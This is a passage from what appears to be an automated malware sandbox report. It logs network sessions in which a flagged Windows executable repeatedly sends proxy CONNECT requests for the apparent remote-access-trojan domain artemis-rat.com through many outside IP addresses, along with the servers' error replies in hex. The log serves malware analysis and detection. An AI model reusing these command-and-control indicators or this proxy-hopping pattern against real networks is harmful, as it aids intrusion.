                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1358192.168.2.454363202.159.35.1214437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.595279932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1359192.168.2.454365128.199.175.1454437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.595400095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1360192.168.2.454246104.20.51.99807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.597742081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.751943111 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1361192.168.2.454372202.159.35.1214437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.601072073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1362192.168.2.454373128.199.175.1454437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.601465940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1363192.168.2.453764198.23.143.2469697284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.603447914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.663340092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.663685083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.757134914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.866223097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:59.866202116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1364192.168.2.454374202.159.35.1214437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.604707003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1365192.168.2.454267172.67.181.32807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.607816935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.763242006 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1366192.168.2.454377202.159.35.1214437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.608009100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1367192.168.2.454270104.25.184.189807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.609615088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.763889074 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1368192.168.2.454258162.159.242.252807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.611577034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.773025036 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1369192.168.2.454272203.161.32.242610707284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.616669893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.073056936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.663456917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.732072115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.757383108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.866636038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.037687063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.070422888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.164287090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1370192.168.2.454286172.67.181.37807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.618729115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.772855997 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1371192.168.2.45419038.162.17.13931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.621782064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.032666922 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1372192.168.2.45420438.162.18.4431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.623776913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.038511038 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1373192.168.2.454296172.67.181.136807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.626211882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.780487061 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1374192.168.2.4542115.161.103.113807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.629122972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.844384909 CET327INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1375192.168.2.45429466.225.246.23880807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.631369114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.792507887 CET731INHTTP/1.1 405 Not Allowed
                                              Server: nginx/1.22.1
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 559
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.22.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                              Mar 11, 2024 08:37:24.236955881 CET731INHTTP/1.1 405 Not Allowed
                                              Server: nginx/1.22.1
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 559
                                              Connection: keep-alive
